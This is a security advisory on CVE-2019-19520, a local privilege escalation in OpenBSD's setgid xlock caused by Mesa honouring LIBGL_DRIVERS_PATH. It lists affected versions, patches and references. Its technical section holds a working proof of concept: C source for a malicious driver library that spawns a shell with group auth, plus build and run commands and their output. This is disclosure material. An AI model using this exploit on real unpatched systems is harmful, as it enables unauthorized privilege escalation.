ASA-2019-00651 – OpenBSD: Local privilege escalation via xlock

Posted on by Allele Security Intelligence in Alerts

Allele Security Alert

ASA-2019-00651

Identifier(s)

ASA-2019-00651, CVE-2019-19520

Title

Local privilege escalation via xlock

Vendor(s)

The OpenBSD Project

Product(s)

OpenBSD

Affected version(s)

OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020

Fixed version(s)

OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020

OpenBSD versions 6.6 with the following patch applied:

009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig

OpenBSD versions 6.5 with the following patch applied:

020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig

Proof of concept

Yes

Description

xlock in OpenBSD allows local users to gain the privileges of the auth group by providing a LIBGL_DRIVERS_PATH environment variable, because xenocara/lib/mesa/src/loader/loader.c mishandles dlopen.

Technical details

On OpenBSD, /usr/X11R6/bin/xlock is installed by default and is set-group-ID “auth”, not set-user-ID; the following check is therefore incomplete and should use issetugid() instead:

101 _X_HIDDEN void *
102 driOpenDriver(const char *driverName)
103 {
...
113 if (geteuid() == getuid()) {
114 /* don't allow setuid apps to use LIBGL_DRIVERS_PATH */
115 libPaths = getenv("LIBGL_DRIVERS_PATH");

A local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group “auth”:

$ id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)

$ cd /tmp

$ cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>

static void __attribute__ ((constructor)) _init (void) {
gid_t rgid, egid, sgid;
if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);

char * const argv[] = { _PATH_KSHELL, NULL };
execve(argv[0], argv, NULL);
_exit(__LINE__);
}
EOF

$ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c

$ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &
[1] 2706

$ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66

$ id
uid=32767(nobody) gid=11(auth) groups=32767(nobody)

Credits

Qualys Research Team

Reference(s)

OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html

OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html

009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig

020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig

Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414

Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14

oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5

Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8

CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520

CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: February 11, 2020

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.